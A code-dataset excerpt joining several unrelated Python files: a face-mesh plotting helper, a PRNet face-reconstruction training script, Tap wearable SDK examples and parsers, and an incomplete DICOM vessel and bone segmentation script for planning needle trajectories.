#### File: face3d/mesh_numpy/vis.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import matplotlib.pyplot as plt
from skimage import measure
from mpl_toolkits.mplot3d import Axes3D
def plot_mesh(vertices, triangles, subplot = [1,1,1], title = 'mesh', el = 90, az = -90, lwdt=.1, dist = 6, color = "grey"):
'''
plot the mesh
Args:
vertices: [nver, 3]
triangles: [ntri, 3]
'''
ax = plt.subplot(subplot[0], subplot[1], subplot[2], projection = '3d')
ax.plot_trisurf(vertices[:, 0], vertices[:, 1], vertices[:, 2], triangles = triangles, lw = lwdt, color = color, alpha = 1)
ax.axis("off")
ax.view_init(elev = el, azim = az)
ax.dist = dist
plt.title(title)
### -------------- Todo: use vtk to visualize mesh? or visvis? or VisPy?
```
#### File: jnulzl/jnulzl-PRNet/train.py
```python
import numpy as np
import os
import argparse
import tensorflow as tf
import cv2
import random
from predictor import resfcn256
import math
from datetime import datetime
class TrainData(object):
def __init__(self, train_data_file):
super(TrainData, self).__init__()
self.train_data_file = train_data_file
self.train_data_list = []
self.readTrainData()
self.index = 0
self.num_data = len(self.train_data_list)
def readTrainData(self):
with open(self.train_data_file) as fp:
temp = fp.readlines()
for item in temp:
item = item.strip().split()
self.train_data_list.append(item)
random.shuffle(self.train_data_list)
def getBatch(self, batch_list):
batch = []
imgs = []
labels = []
for item in batch_list:
img = cv2.imread(item[0])
label = np.load(item[1])
img_array = np.array(img, dtype=np.float32)
imgs.append(img_array / 256.0 / 1.1)
label_array = np.array(label, dtype=np.float32)
labels.append(label_array / 256 / 1.1)
batch.append(imgs)
batch.append(labels)
return batch
def __call__(self, batch_num):
if (self.index + batch_num) <= self.num_data:
batch_list = self.train_data_list[self.index:(self.index + batch_num)]
batch_data = self.getBatch(batch_list)
self.index += batch_num
return batch_data
else:
self.index = 0
random.shuffle(self.train_data_list)
batch_list = self.train_data_list[self.index:(self.index + batch_num)]
batch_data = self.getBatch(batch_list)
self.index += batch_num
return batch_data
def main(args):
# Some arguments
os.environ['CUDA_VISIBLE_DEVICES'] = args.gpu
batch_size = args.batch_size
epochs = args.epochs
train_data_file = args.train_data_file
model_path = args.model_path
save_dir = args.checkpoint
if not os.path.exists(save_dir):
os.makedirs(save_dir)
# Training data
data = TrainData(train_data_file)
begin_epoch = 0
if os.path.exists(model_path + '.data-00000-of-00001'):
begin_epoch = int(model_path.split('_')[-1]) + 1
epoch_iters = data.num_data / batch_size
global_step = tf.Variable(epoch_iters * begin_epoch, trainable=False)
    # Decay learning rate by half every 5 epochs
decay_steps = 5 * epoch_iters
# learning_rate = learning_rate * 0.5 ^ (global_step / decay_steps)
learning_rate = tf.train.exponential_decay(args.learning_rate, global_step,
decay_steps, 0.5, staircase=True)
x = tf.placeholder(tf.float32, shape=[None, 256, 256, 3])
label = tf.placeholder(tf.float32, shape=[None, 256, 256, 3])
# Train net
net = resfcn256(256, 256)
x_op = net(x, is_training=True)
# Loss
weights = cv2.imread("Data/uv-data/weight_mask_final.jpg") # [256, 256, 3]
weights_data = np.zeros([1, 256, 256, 3], dtype=np.float32)
weights_data[0, :, :, :] = weights # / 16.0
loss = tf.losses.mean_squared_error(label, x_op, weights_data)
# This is for batch norm layer
update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)
with tf.control_dependencies(update_ops):
train_step = tf.train.AdamOptimizer(learning_rate=learning_rate,
beta1=0.9, beta2=0.999, epsilon=1e-08,
use_locking=False).minimize(loss, global_step=global_step)
sess = tf.Session(config=tf.ConfigProto(gpu_options=tf.GPUOptions(allow_growth=True)))
sess.run(tf.global_variables_initializer())
if os.path.exists(model_path + '.data-00000-of-00001'):
tf.train.Saver(net.vars).restore(sess, model_path)
saver = tf.train.Saver(var_list=tf.global_variables())
save_path = model_path
# Begining train
time_now = datetime.now().strftime("%Y_%m_%d_%H_%M_%S")
fp_log = open("log_" + time_now + ".txt","w")
iters_total_each_epoch = int(math.ceil(1.0 * data.num_data / batch_size))
for epoch in range(begin_epoch, epochs):
for iters in range(iters_total_each_epoch):
batch = data(batch_size)
loss_res, _, global_step_res, learning_rate_res = sess.run(
[loss, train_step, global_step, learning_rate], feed_dict={x: batch[0], label: batch[1]})
time_now_tmp = datetime.now().strftime("%Y-%m-%d_%H:%M:%S")
log_line = '[' + time_now_tmp + ']:' + 'global_step:%d:iters:%d/epoch:%d,learning rate:%f,loss:%f' % (global_step_res, iters, epoch, learning_rate_res, loss_res)
print(log_line)
fp_log.writelines(log_line + "\n")
saver.save(sess=sess, save_path=save_path + '_' + str(epoch))
fp_log.close()
if __name__ == '__main__':
par = argparse.ArgumentParser(description='Joint 3D Face Reconstruction and Dense Alignment with Position Map Regression Network')
par.add_argument('--train_data_file', default='face3d/examples/trainDataLabel.txt', type=str, help='The training data file')
par.add_argument('--learning_rate', default=0.0002, type=float, help='The learning rate')
par.add_argument('--epochs', default=50, type=int, help='Total epochs')
par.add_argument('--batch_size', default=16, type=int, help='Batch sizes')
par.add_argument('--checkpoint', default='checkpoint/', type=str, help='The path of checkpoint')
par.add_argument('--model_path', default='checkpoint/256_256_resfcn256_weight', type=str, help='The path of pretrained model')
par.add_argument('--gpu', default='0', type=str, help='The GPU ID')
main(par.parse_args())
``` |
{
"source": "jnunez101/tap-python-sdk",
"score": 3
} |
#### File: tap-python-sdk/examples/example_linux.py
```python
from tapsdk import TapSDK, TapInputMode
from tapsdk.models import AirGestures
import os
os.environ["PYTHONASYNCIODEBUG"] = str(1)
import asyncio
import platform
import logging
from bleak import _logger as logger
import time
def notification_handler(sender, data):
"""Simple notification handler which prints the data received."""
print("{0}: {1}".format(sender, data))
def OnMouseModeChange(identifier, mouse_mode):
print(identifier + " changed to mode " + str(mouse_mode))
def OnTapped(identifier, tapcode):
print(identifier + " tapped " + str(tapcode))
def OnGesture(identifier, gesture):
print(identifier + " gesture " + str(AirGestures(gesture)))
def OnTapConnected(self, identifier, name, fw):
print(identifier + " Tap: " + str(name), " FW Version: ", fw)
def OnTapDisconnected(self, identifier):
print(identifier + " Tap: " + identifier + " disconnected")
def OnMoused(identifier, vx, vy, isMouse):
print(identifier + " mouse movement: %d, %d, %d" %(vx, vy, isMouse))
def OnRawData(identifier, packets):
# imu_msg = [m for m in packets if m["type"] == "imu"][0]
# if len(imu_msg) > 0:
# OnRawData.cnt += 1
# if OnRawData.cnt == 10:
# OnRawData.cnt = 0
# logger.info(identifier + " raw imu : " + str(imu_msg["ts"]))
for m in packets:
if m["type"] == "imu":
# print("imu")
OnRawData.imu_cnt += 1
if OnRawData.imu_cnt == 208:
OnRawData.imu_cnt = 0
# print("imu, " + str(time.time()) + ", " + str(m["payload"]))
if m["type"] == "accl":
# print("accl")
OnRawData.accl_cnt += 1
if OnRawData.accl_cnt == 200:
OnRawData.accl_cnt = 0
print("accl, " + str(time.time()) + ", " + str(m["payload"]))
OnRawData.imu_cnt = 0
OnRawData.accl_cnt = 0
OnRawData.cnt = 0
async def run(loop, debug=False):
if debug:
import sys
# loop.set_debug(True)
l = logging.getLogger("asyncio")
l.setLevel(logging.DEBUG)
h = logging.StreamHandler(sys.stdout)
h.setLevel(logging.INFO)
l.addHandler(h)
logger.addHandler(h)
client = TapSDK(loop)
# devices = await client.list_connected_taps()
x = await client.manager.connect_retrieved()
x = await client.manager.is_connected()
logger.info("Connected: {0}".format(x))
#await client.set_input_mode(TapInputMode("raw"))
#await client.register_air_gesture_events(OnGesture)
#await client.register_tap_events(OnTapped)
# await client.register_raw_data_events(OnRawData)
#await client.register_mouse_events(OnMoused)
#await client.register_air_gesture_state_events(OnMouseModeChange)
#await asyncio.sleep(3)
await client.set_input_mode(TapInputMode("raw", sensitivity=[0,0,0]))
await asyncio.sleep(3)
# await client.set_input_mode(TapInputMode("text"))
# await asyncio.sleep(3)
# await client.set_input_mode(TapInputMode("raw", sensitivity=[2,2,2]))
# await client.send_vibration_sequence([100, 200, 300, 400, 500])
await asyncio.sleep(50.0, loop=loop)
if __name__ == "__main__":
loop = asyncio.get_event_loop()
loop.run_until_complete(run(loop, True))
```
#### File: backends/macos/inputmodes.py
```python
import logging
class TapInputMode:
def __init__(self, mode, sensitivity:list=[0,0,0]):
self._modes = {
"text" : {"name": "Text Mode", "code": bytearray([0x3,0xc,0x0,0x0])},
"controller" : {"name": "Controller Mode", "code": bytearray([0x3,0xc,0x0,0x1])},
"controller_text" : {"name": "Controller and Text Mode", "code": bytearray([0x3,0xc,0x0,0x3])},
"raw" : {"name": "Raw sensors Mode", "code": bytearray([0x3,0xc,0x0,0xa])}
}
self.sensitivity = sensitivity
if mode in self._modes.keys():
self.mode = mode
if mode == "raw":
self._register_sensitivity(sensitivity)
else:
logging.warning("Invalid mode \"%s\". Set to \"text\"" % mode)
self.mode = "text"
def _register_sensitivity(self, sensitivity):
if isinstance(sensitivity, list) and len(sensitivity) == 3:
sensitivity[0] = max(0, min(4,sensitivity[0])) # fingers accelerometers
sensitivity[1] = max(0, min(5,sensitivity[1])) # imu gyro
sensitivity[2] = max(0, min(4,sensitivity[2])) # imu accelerometer
self.sensitivity = sensitivity
self._modes["raw"]["code"] = self._modes["raw"]["code"][:4] + bytearray(sensitivity)
def get_command(self):
return self._modes[self.mode]["code"]
def get_name(self):
return self._modes[self.mode]["name"]
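# --- Hedged usage sketch (editor addition, not part of the original file) ---
# The sensitivity triple is clamped to the ranges documented in
# _register_sensitivity; the values below are illustrative only.
if __name__ == '__main__':
    raw_mode = TapInputMode("raw", sensitivity=[9, 9, 9])   # clamped to [4, 5, 4]
    print(raw_mode.get_name(), list(raw_mode.get_command()))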
```
#### File: tap-python-sdk/tapsdk/parsers.py
```python
def tapcode_to_fingers(tapcode:int):
    return '{0:05b}'.format(tapcode)[::-1]
def mouse_data_msg(data: bytearray):
vx = int.from_bytes(data[1:3],"little", signed=True)
vy = int.from_bytes(data[3:5],"little", signed=True)
prox = data[9] == 1
return vx, vy, prox
def air_gesture_data_msg(data: bytearray):
return [data[0]]
def tap_data_msg(data: bytearray):
return [data[0]]
def raw_data_msg(data: bytearray):
'''
raw data is packed into messages with the following structure:
[msg_type (1 bit)][timestamp (31 bit)][payload (12 - 30 bytes)]
* msg type - '0' for imu message
- '1' for accelerometers message
* timestamp - unsigned int, given in milliseconds
* payload - for imu message is 12 bytes
composed by a series of 6 uint16 numbers
representing [g_x, g_y, g_z, xl_x, xl_y, xl_z]
- for accelerometers message is 30 bytes
composed by a series of 15 uint16 numbers
representing [xl_x_thumb , xl_y_thumb, xl_z_thumb,
xl_x_finger, xl_y_finger, xl_z_finger,
...]
'''
L = len(data)
ptr = 0
messages = []
while ptr <= L:
# decode timestamp and message type
ts = int.from_bytes(data[ptr:ptr+4],"little", signed=False)
if ts == 0:
break
ptr += 4
# resolve message type
if ts > raw_data_msg.msg_type_value:
msg = "accl"
ts -= raw_data_msg.msg_type_value
num_of_samples = 15
else:
msg = "imu"
num_of_samples = 6
# parse payload
payload = []
for i in range(num_of_samples):
payload.append(int.from_bytes(data[ptr:ptr+2],"little", signed=True))
ptr += 2
messages.append({"type":msg, "ts":ts, "payload":payload})
return messages
raw_data_msg.msg_type_value = 2**31
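# --- Hedged worked example (editor addition, not part of the original file) ---
# Builds one IMU packet following the layout described in the docstring above:
# a 4-byte little-endian timestamp (top bit clear => IMU) followed by six
# little-endian int16 samples [g_x, g_y, g_z, xl_x, xl_y, xl_z].
if __name__ == '__main__':
    ts_bytes = (123).to_bytes(4, "little")
    samples = b"".join(int(v).to_bytes(2, "little", signed=True)
                       for v in (1, -2, 3, -4, 5, -6))
    print(raw_data_msg(bytearray(ts_bytes + samples)))
    # expected: [{'type': 'imu', 'ts': 123, 'payload': [1, -2, 3, -4, 5, -6]}]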
``` |
{
"source": "jnu-ose-biomedical-ultrasound-lab/dicomsegmentation",
"score": 3
} |
#### File: jnu-ose-biomedical-ultrasound-lab/dicomsegmentation/bloodHunt.py
```python
from scipy import io
import os
import pydicom
import numpy as np
import pickle
from skimage.filters import frangi, hessian
from skimage.feature import hessian_matrix, hessian_matrix_eigvals
from scipy.ndimage import rotate
from scipy import ndimage
from scipy import stats
from pylab import *
from scipy.ndimage import measurements,morphology
import matplotlib.patches as mpatches
from skimage import data
from skimage.filters import threshold_otsu
from skimage.segmentation import clear_border
from skimage.measure import label, regionprops
from skimage.morphology import closing, square
from skimage.color import label2rgb
from skimage.morphology import disk, dilation, binary_erosion, binary_closing
from skimage.filters import roberts, sobel
from scipy import ndimage as ndi
import matplotlib.pyplot as plt
from sklearn.cluster import DBSCAN
from sklearn import metrics
from sklearn.preprocessing import StandardScaler
from mpl_toolkits.mplot3d import Axes3D
from math import atan
import cv2
def load_patient(src_dir):
slices = [pydicom.read_file(src_dir + '/' + s, force=True) for s in os.listdir(src_dir)]
# slices.sort(key=lambda x: int(x.InstanceNumber))
#slices.sort(key=lambda x: int(si for len(slices)))
try:
slice_thickness = np.abs(slices[0].ImagePositionPatient[2] - slices[1].ImagePositionPatient[2])
except:
slice_thickness = np.abs(slices[0].SliceLocation - slices[1].SliceLocation)
for s in slices:
s.SliceThickness = slice_thickness
return slices
def slicesInstanceNumber(slices):
image = np.stack([s.pixel_array for s in slices])
#image=frangi(image)
return image
def boneSegmentation(array, threshold):
image = np.where((array > threshold[0]) & (array < threshold[1]), 255, 0)
binary = np.where(image == 255, 1, 0)
return image, binary
def DICOMtoNumpyStack(slices):
image=slicesInstanceNumber(slices)
#image = np.stack([s.pixel_array for s in slices])
image = image.astype(np.int16)
image[image == -2000] = 0
for slice_number in range(len(slices)):
intercept = slices[slice_number].RescaleIntercept
slope = slices[slice_number].RescaleSlope
if slope != 1:
image[slice_number] = slope * image[slice_number].astype(np.float64)
image[slice_number] = image[slice_number].astype(np.int16)
image[slice_number] += np.int16(intercept)
return np.array(image, dtype=np.int16)
def DICOMtoNumpy(slices):
image = np.stack([s.pixel_array for s in slices])
#image=frangi(image)
return image
def count_items(img1_f, it):
im_open = morphology.binary_opening( \
img1_f,ones((9,5)), iterations=it)
labels_open, nbr_objects_open = measurements.label(im_open)
return labels_open
def outputPNG(image, out_dir):
for i in range(image.shape[0]):
img_path = out_dir + "/img_" + str(i).rjust(4, '0') + ".png"
cv2.imwrite(img_path, image[i])
def costMapGeneration(array):
# bone segmentation
threshold = [1250, 3000]
image1, binary1 = boneSegmentation(array, threshold)
# blood segmentation
image, binary = boneSegmentation(array, [1, 250])
img = np.uint8(image)
# vessel segmentation
threshold2 = [1, 300]
img=np.squeeze(img)
kernel = np.ones((6,6),np.float32)/36
img = cv2.filter2D(img,-1,kernel)
imgB0=img
# best image
img=np.squeeze(array)
img = cv2.filter2D(img,-1,kernel)
img0=img
img = cv2.erode(img, kernel, iterations=2)
img = cv2.dilate(img, kernel, iterations=2)
img2 = cv2.erode(img, kernel, iterations=1)
imf=img
imf = cv2.dilate(imf, kernel, iterations=1)
imf = cv2.erode(imf, kernel, iterations=1)
imf = np.where((imf < 100), 0, 255)
img11 = np.where((img < img.mean()), 0, 255)
img21 = np.where((img2 < img.mean()), 0, 255)
img3=img11+img21
img4=np.where((img3 != 0), 255, 0)
kernel = np.ones((2,2),np.float32)/4
img = cv2.filter2D(img0,-1,kernel)
hxx, hxy, hyy = hessian_matrix(img, sigma=1)
i1, i2 = hessian_matrix_eigvals(hxx, hxy, hyy)
img = cv2.erode(img, kernel, iterations=2)
imgh = np.where((i2 < i2.mean()), 255, 0)
img = cv2.dilate(img, kernel, iterations=2)
img20 = cv2.erode(img, kernel, iterations=20)
img20 = np.where((img20 < img20.mean()), 0, 255)
otherPlace=np.where((img20 <= 0), 255, 0)
otherPlace=np.where((otherPlace <= 0), 255, 0)
img10 = cv2.erode(img, kernel, iterations=10)
img10 = np.where((img10 < img10.mean()), 0, 255)
otherPlace10=np.where((img10 <= 0), 255, 0)
otherPlace10=np.where((otherPlace10 <= 0), 255, 0)
img55 = cv2.erode(img, kernel, iterations=5)
img55 = np.where((img55 < img55.mean()), 0, 255)
otherPlace55=np.where((img55 <= 0), 255, 0)
otherPlace55=np.where((otherPlace55 <= 0), 255, 0)
img15 = cv2.erode(img, kernel, iterations=5)
img15 = np.where((img15 < img15.mean()), 0, 255)
otherPlace15=np.where((img15 <= 0), 255, 0)
otherPlace15=np.where((otherPlace15 <= 0), 255, 0)
OP=otherPlace15+otherPlace+otherPlace55+otherPlace10
OP=np.where((OP > 0), 255, 0)
img2 = cv2.erode(img, kernel, iterations=3)
img = np.where((img < img.mean()), 0, 255)
img2 = np.where((img2 < img.mean()), 0, 255)
img5=img4-img2
img6=np.where((img5 != 0), 255, 0)
imgFrame=np.where((img20 <= img20.mean()), 0, 255)
victorFrame=np.where((imf != 0), 0, 255)
victorFrame=np.where((victorFrame <= 0), 0, 255)
tangoZone=victorFrame+imgh
bF=np.where((imgB0 < 255), 255, 0)
OP1=OP-imf
OP=np.where((OP <= 0), 255, 0)
superZone=bF-OP
superZone=np.where((superZone <= 0), 0, 255)
superZone=superZone-img11
superZone=np.where((superZone <= 0), 0, 255)
superZone=superZone-OP1
superZone=np.where((superZone <= 0), 0, 255)
comboZone=tangoZone+img11-(binary)
comboZone=np.where((comboZone <= 0), 255, 0)
comboZone=np.where((comboZone <= 200), 255, 0)
comboZone=np.where((comboZone <= 0), 255, 0)
targetZone=comboZone
comboZone=targetZone-otherPlace55
comboZone=np.where((comboZone <= 0) & (comboZone < 255), 0, 255)
binZone=superZone+comboZone
binZone=np.where((binZone > 0), 255, 0)
binV2=np.squeeze(binZone)
# bone cost
binV1=np.squeeze(binary)
# all squares now have a cost
costMapV=np.where(binV1==1,1000,1)
costMapB=np.where(binV2==1,9000,1)
# final costmap
costMap=np.squeeze(costMapV+costMapB)
return(costMap,imgB0)
#set target equal to some nice negative number
def trajectoryPlannerSimple(costMap,target0,target1):
A=costMap
costMap[target0,target1]=-30000000
topDown=sum(A[target0,0:target1]) #assuming directly above the target is 0 degrees of a circle
bottomDown=sum(A[target0,target1:]) # assuming this is 180 degrees opposite of the 'top'
leftEntrance=sum(A[0:target0,target1]) # 90 degrees, clockwise from top
rightEntrance=sum(A[target0:,target1]) # 270 degrees, clockwise from top
cost=np.array([topDown,leftEntrance,bottomDown,rightEntrance])
angles=np.array([0,90,180,270])
angleMin=angles[np.where(cost==cost.min())]
return(angleMin,cost.min())
def trajectoryPlanner(costMap,target0,target1):
A=costMap
cost=np.zeros(359)
cost[0]=sum(A[target0,0:target1]) #assuming directly above the target is 0 degrees of a circle
for ii in range(0,359):
costMap[target0,target1]=-30000000
A=rotate(costMap,ii)
cost[ii]=sum(A[target0,0:target1])
    angles = np.arange(0, 359)
angleMin=angles[np.where(cost==cost.min())]
return(angleMin,cost.min())
def segmentAngle(costMap,target0,target1):
angleMinSimple, costMinSimple=trajectoryPlannerSimple(costMap,target0,target1)
angleMin, costMin=trajectoryPlanner(costMap,target0,target1)
recAngle=np.array([angleMinSimple,angleMin])
costCompare=np.array([costMinSimple,costMin])
finalCostMin=costCompare.min()
finalAngle=recAngle[np.where(costCompare==finalCostMin)]
    return(finalAngle,finalCostMin)
def maskedVesselSegmentation(array):
image, binary = boneSegmentation(array, [1, 300])
kernel = np.ones((4,4),np.float32)/16
img=np.squeeze(np.uint8(binary))
img = cv2.filter2D(img,-1,kernel)
img = cv2.erode(img, kernel, iterations=1)
img = cv2.dilate(img, kernel, iterations=1)
img = cv2.erode(img, kernel, iterations=1)
img=frangi(img)
hxx, hxy, hyy = hessian_matrix(img, sigma=3)
i1, i2 = hessian_matrix_eigvals(hxx, hxy, hyy)
img=i2/abs(i2.max())
img=np.squeeze(np.uint8(img))
threshold=img.max()-img.mean()
img=np.squeeze(np.uint8(img))
img = cv2.erode(img, kernel, iterations=1)
img=np.squeeze(np.uint8(img))
img = cv2.dilate(img, kernel, iterations=1)
threshold=img.max()-img.mean()
image = np.where((img > threshold), 255, 0)
return(image)
def trajectoryPlanner3D(costMap,target0,target1,target2):
A=costMap
A[target0,target1,target2]=-30000000
distance=360*3
xx=np.array(np.zeros(360))
yy=xx
zz=yy
costX0=sum(A[0:target0,target1,target2])
costY0=sum(A[target0,0:target1,target2])
costZ0=sum(A[target0,target1,0:target2])
for xi in range(0,359):
xplane=np.squeeze(A[target0,:,:])
x2=rotate(xplane,xi)
xx[xi]=sum(x2[0,0:target1])+sum(x2[1,0:target2])
costX=xx.min()
xAng=np.where((xx==xx.min()) & (xx!=0))
for yi in range(0,359):
yplane=np.squeeze(A[:,target1,:])
y2=rotate(yplane,yi)
yy[yi]=sum(y2[0,0:target0])+sum(y2[1,0:target2])
costY=yy.min()
yAng=np.where((yy==yy.min()) & (yy!=0))
for zi in range(0,359):
zplane=np.squeeze(A[:,:,target2])
z2=rotate(zplane,zi)
zz[zi]=sum(z2[0,0:target0])+sum(z2[1,0:target1])
costZ=zz.min()
zAng=np.where((zz==zz.min()) & (zz!=0))
minCost=np.array([costX,costY,costZ])
if costX > costX0:
xAng=0
minCost[0]=costX0
if costY > costY0:
yAng=0
minCost[1]=costY0
if costZ > costZ0:
zAng=0
        minCost[2]=costZ0
totalCost=sum(minCost)
xPro=minCost[0]/totalCost
yPro=minCost[1]/totalCost
zPro=minCost[2]/totalCost
outVec=np.zeros(3)
outVec[0]=np.asarray(xAng**xPro)
outVec[1]=np.asarray(yAng**yPro)
outVec[2]=np.asarray(zAng**zPro)
return(xAng,yAng,zAng,minCost,outVec)
def wheelCost(costMap,target0,target1):
# Calculate cost for each 45 degree increment.
a1=np.trace(costMap[:target0,:target1]) # 1 + 5: 315
a2=np.sum(costMap[:target0,:target1], axis=0)[1] # 2 + 5: 0
a3=np.trace(np.rot90(costMap[:target0,(target1-1):])) # 5 + 3: 45
a4=np.sum(costMap[:target0,(target1-1):], axis=1)[1] # 5 + 6: 90
a5=np.trace(costMap[(target0-1):,(target1-1):]) # 5 + 9: 135
a6=np.sum(costMap[(target0-1):,(target1-1):], axis=0)[0] # 5 + 8: 180
a7=np.trace(np.rot90(costMap[(target0-1):,:target1])) # 7 + 5: 225
a8=np.sum(costMap[(target0-1):,:target1], axis=1)[0] # 4 + 5: 270
a=np.array([a1,a2,a3,a4,a5,a6,a7,a8])
anglePos=np.where(a==a.min())
return(anglePos,a)
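# --- Illustrative sketch (added, not part of the original script) ---
# Hedged example of wheelCost on a synthetic slice: it returns the index of the
# cheapest 45-degree spoke (anglePos) and the eight spoke costs (a). demoSlice is
# a hypothetical name; the target is assumed to lie inside the array.
# demoSlice = np.ones((100, 100))
# anglePosDemo, spokeCosts = wheelCost(demoSlice, 50, 50)
# print(anglePosDemo, spokeCosts)                   # index of cheapest spoke and the 8 summed costs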
def maskFusion(img,mask):
# Combine the masks.
fused=img-mask
img=np.where((fused >= 0), 255, 0)
outImg=np.where((img == 0), 255, 0)
return(outImg)
def costSlicer(outImg,binary):
# fuse the cost maps of blood and bone
if abs(outImg.max())==0:
outImg=outImg
else:
outImg=outImg/abs(outImg.max())
bloodImg=np.uint8(outImg)
bloodImg=np.where(bloodImg>=1,9000,0)
if abs(binary.max())==0:
boneImg=np.uint8(abs(binary))
else:
boneImg=np.uint8(abs(binary/binary.max()))
boneImg=np.where(boneImg>=1,6000,0)
costSlice=np.squeeze(bloodImg+boneImg)
return(costSlice)
def starPoint(anglePos1):
degree=anglePos1[0].max()
if (degree >= 0) & (degree <= 30):
cd = 0
if (degree > 30) & (degree <= 60):
cd = 1
if (degree > 60) & (degree <= 105):
cd = 2
if (degree > 105) & (degree <= 150):
cd = 3
if (degree > 150) & (degree <= 195):
cd = 4
if (degree > 195) & (degree <= 240):
cd = 5
if (degree > 240) & (degree <= 285):
cd = 6
if (degree > 285) & (degree <= 330):
cd = 7
if (degree > 330) & (degree <= 359):
cd = 0
if cd==0: # val
dx=0
dy=-1
if cd==1: # val
dx=1
dy=-1
if cd==2:# val
dx=1
dy=0
if cd==3:# val
dx=1
dy=1
if cd==4: #val
dx=0
dy=1
if cd==5:# val
dx=-1
dy=1
if cd==6:# val
dx=-1
dy=0
if cd==7:# val
dx=-1
dy=-1
return(dx,dy,cd)
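# --- Illustrative sketch (added, not part of the original script) ---
# Hedged example of starPoint: given a np.where-style tuple holding an entry angle in
# degrees, it maps the angle bin to a unit step (dx, dy) and the bin index cd. The
# literal below is made up for illustration.
# dxDemo, dyDemo, cdDemo = starPoint((np.array([135]),))   # falls in the 105-150 degree bin
# print(dxDemo, dyDemo, cdDemo)                            # -> 1, 1, 3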
def endPointCalculator(anglePos,dimsize1,dimsize2,targetA,targetB):
cord1=0
cord2=0
# Note: These values require debugging and testing.
if anglePos==0:
cord1=0
cord2=(dimsize2-1)
if anglePos==1:
cord1=targetA
cord2=(dimsize2-1)
if anglePos==2:
cord1=(dimsize1-1)
cord2=(dimsize2-1)
if anglePos==3:
cord1=(dimsize1-1)
cord2=targetB
if anglePos==4:
cord1=(dimsize1-1)
cord2=0
if anglePos==5:
cord1=targetA
cord2=0
if anglePos==6:
cord1=0
cord2=0
if anglePos==7:
cord1=0
cord2=targetB
return(cord1,cord2)
def sphereCost(costMap,target0,target1,target2):
# This function was intended to calculate 26 possible trajectories for the input point.
# First, the length of each dimension of the 3D array is measured.
# Then, wheelCost is used to calculate the lowest cost angle (anglePos) and cost value vector (a) for each plane.
# Following this, the lowest cost trajectory is planned and the end point of each trajectory is calculated.
# All values are compared to find the lowest total cost trajectory.
# The cost map values between the target and the end point are set to a high contrast value to allow for easier plotting.
costMap=np.asarray(costMap)
xsize=len(np.squeeze(costMap[:,0,0]))
ysize=len(np.squeeze(costMap[0,:,0]))
zsize=len(np.squeeze(costMap[0,0,:]))
costMap=costMap+1
direct1=np.sum(costMap[0:target0,0:target1,0:target2])
direct2=np.sum(costMap[target0:(xsize-1),target1:(ysize-1),target2:(zsize-1)])
axisx1=np.sum(costMap[0:target0,0,0])
axisx1=np.sum(costMap[0:target0,target1,target2])
axisx2=np.sum(costMap[target0:(xsize-1),0,0])
axisx2=np.sum(costMap[target0:(xsize-1),target1,target2])
minX=min([axisx1,axisx2])
axisy1=np.sum(costMap[0,0:target1,0])
axisy1=np.sum(costMap[target0,0:target1,target2])
axisy2=np.sum(costMap[0,target1:(ysize-1),0])
axisy2=np.sum(costMap[target0,target1:(ysize-1),target2])
minY=min([axisy1,axisy2])
axisz1=np.sum(costMap[0,0,0:target2])
axisz1=np.sum(costMap[target0,target1,0:target2])
axisz2=np.sum(costMap[0,0,target2:(zsize-1)])
axisz2=np.sum(costMap[target0,target1,target2:(zsize-1)])
minZ=min([axisz1,axisz2])
defFrame=min([axisx1,axisx2,axisy1,axisy2,axisz1,axisz2,direct1,direct2])
if (defFrame==axisx1) or (defFrame==axisy1) or (defFrame==axisz1) or (defFrame==direct1):
dx=0
dy=0
dz=0
if defFrame==axisz2:
dx=0
dy=0
dz=(zsize-1)
if defFrame==axisy2:
dx=0
dy=(ysize-1)
dz=0
if defFrame==axisx2:
dx=(xsize-1)
dy=0
dz=0
if defFrame==direct2:
dx=(xsize-1)
dy=(ysize-1)
dz=(zsize-1)
# Apply the wheelCost algorithm to each plane.
#XY
anglePos1,a1=wheelCost(np.squeeze(costMap[:,:,target2]),target0,target1)
tracA=np.sum(costMap[0:target0,0:target1,target2])
tracB=np.sum(costMap[0:target0,target1,0:target2])
tracC=np.sum(costMap[target0,0:target1,0:target2])
#XZ
anglePos2,a2=wheelCost(np.squeeze(costMap[:,target1,:]),target0,target2)
anglePos3,a3=wheelCost(np.squeeze(costMap[target0,:,:]),target1,target2)
cordA1,cordA2=endPointCalculator(anglePos1,xsize,ysize,target0,target1)
x=np.sort([target0,cordA1])
y=np.sort([target1,cordA2])
trajA=np.sum(np.squeeze(costMap[x[0]:x[1],y[0]:y[1],target2]))
cordB1,cordB2=endPointCalculator(anglePos2,xsize,zsize,target0,target2)
x=np.sort([target0,cordB1])
z=np.sort([target2,cordB2])
trajB=np.sum(np.squeeze(costMap[x[0]:x[1],target1,z[0]:z[1]]))
trajAB=np.sum(np.squeeze(costMap[x[0]:x[1],y[0]:y[1],target2]))
cordC1,cordC2=endPointCalculator(anglePos3,ysize,zsize,target1,target2)
y=np.sort([target1,cordC1])
z=np.sort([target2,cordC2])
trajC=np.sum(np.squeeze(costMap[target0,y[0]:y[1],z[0]:z[1]]))
defTraj=min([trajA, trajAB, trajB, trajC])
entryCoord=np.array([cordA1,cordA2,cordB2])
if defTraj == trajA:
dx1=cordA1
dy1=cordA2
dz1=target2
if defTraj == trajAB:
dx1=cordB1
dy1=cordA2
dz1=target2
if defTraj == trajB:
dx1=cordB1
dy1=target1
dz1=cordB2
if defTraj == trajC:
dx1=target0
dy1=cordC1
dz1=cordC2
if (abs(defTraj) < abs(defFrame)):
defFrame=defTraj
dx=dx1
dy=dy1
dz=dz1
entryCoord=np.array([dx,dy,dz])
x=np.sort([target0,entryCoord[0]])
y=np.sort([target1,entryCoord[1]])
z=np.sort([target2,entryCoord[2]])
maxVal=100*costMap.max()
costAp=np.copy(costMap)
costAp[x[0]:x[1],y[0]:y[1],z[0]:z[1]]=maxVal
costAp=costAp/maxVal
return(costAp,x,y,z,entryCoord,maxVal,anglePos1,anglePos2)
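# --- Illustrative sketch (added, not part of the original script) ---
# Hedged example of sphereCost on a small synthetic 3D cost volume. demoVol is a
# hypothetical name; the returned costAp has the chosen trajectory burned in as a
# high-contrast value for plotting, and entryCoord is the suggested entry point.
# demoVol = np.ones((20, 20, 20))
# costAp, xr, yr, zr, entryCoord, maxVal, ang1, ang2 = sphereCost(demoVol, 10, 10, 10)
# print(entryCoord, maxVal)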
def rawDicomMiner(file_name,filename,range1):
# Function exports the DICOM values without any segmentation.
nSlices=len(range1)-1
slicer = [pydicom.read_file(filename, force=True)]
image = DICOMtoNumpy(slicer)
imgsize=image.shape
imgsize=np.asarray(imgsize)
